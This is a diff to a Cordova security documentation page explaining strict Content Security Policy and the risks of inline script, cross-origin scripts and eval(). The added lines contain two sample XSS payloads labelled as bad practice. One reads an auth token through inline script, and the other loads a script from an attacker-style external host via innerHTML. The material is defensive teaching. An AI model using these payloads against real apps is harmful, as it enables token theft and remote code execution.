nschonni/cordova-docs/articles/cordova-security/cordova-security-platform.md

 You should only add this preference if you encounter issues as it disables useful features like "Shared Mode".

-##Use a strict content security policy
+##Use a strict Content Security Policy
 By default, simply adding a CSP declaration to an HTML page locks it down very tightly.
 By default, applying a CSP **disables both eval() and inline script** and only allows access to JavaScript and CSS files from the **same origin as the HTML page**.
 Typically for Cordova apps this means only **local content** and as a result, CDN hosted content typically cannot be referenced.
 Breaking these down in terms of risk:

 1. **Inline script** for JavaScript content, though extremely handy for testing and development, is one of the largest risks for attacks.
 When inline script is allowed, all it takes is one unescaped input pumped to innerHTML to allow a user to run any arbitrary JavaScript code.
 Note the inline script restriction also applies to **onload** and similar HTML attributes for the exact same reason.
+For example, imagine textInput in this code game from an input element in HTML:
+    ```javascript
+    // This is bad
+    textInput = "<div id='hack-otuput'></div><script>document.getElementById('hack-output').innerText = app.user.authtoken;</script>"
+    document.getElementById("output-div").innerHTML = textInput;
+    ```

 2. Allowing **JavaScript and CSS content from different origins** poses the next largest risk.
 Disabling inline script reduces the chances of attack, but even with inline script disabled you can still add a script tag with a href to an external source.
 The same innerHTML mistake can then lead to a similar vulnerability.
 While this is obviously true for JavaScript, CSS also poses a risk because directives like expression() and url('javascript:...').
 You can loosen this restriction by listing only very specific domains that you trust but exercise caution when doing so.
+Tweaking the previous example slightly we get:
+    ```javascript
+    // This is also bad
+    textInput = "<div id='hack-otuput'></div><script src='http://iliketohackthings.com/mybadscript.js'></script>"
+    document.getElementById("output-div").innerHTML = textInput;
+    ```
 3. **eval()** along with related features like "new Function" also pose a risk but these are reduced if the inline and same origin restrictions are left in place.
 Further, eval is used by a number of JavaScript frameworks for optimization purposes so while this is the default it can become quite problematic if left in place.
 If your app and all associated frameworks do not make use of eval, you should disable it.
 Otherwise avoid using eval in your own code unless you really know exactly what you are doing.

 Note that none of these rules apply to images or other static content.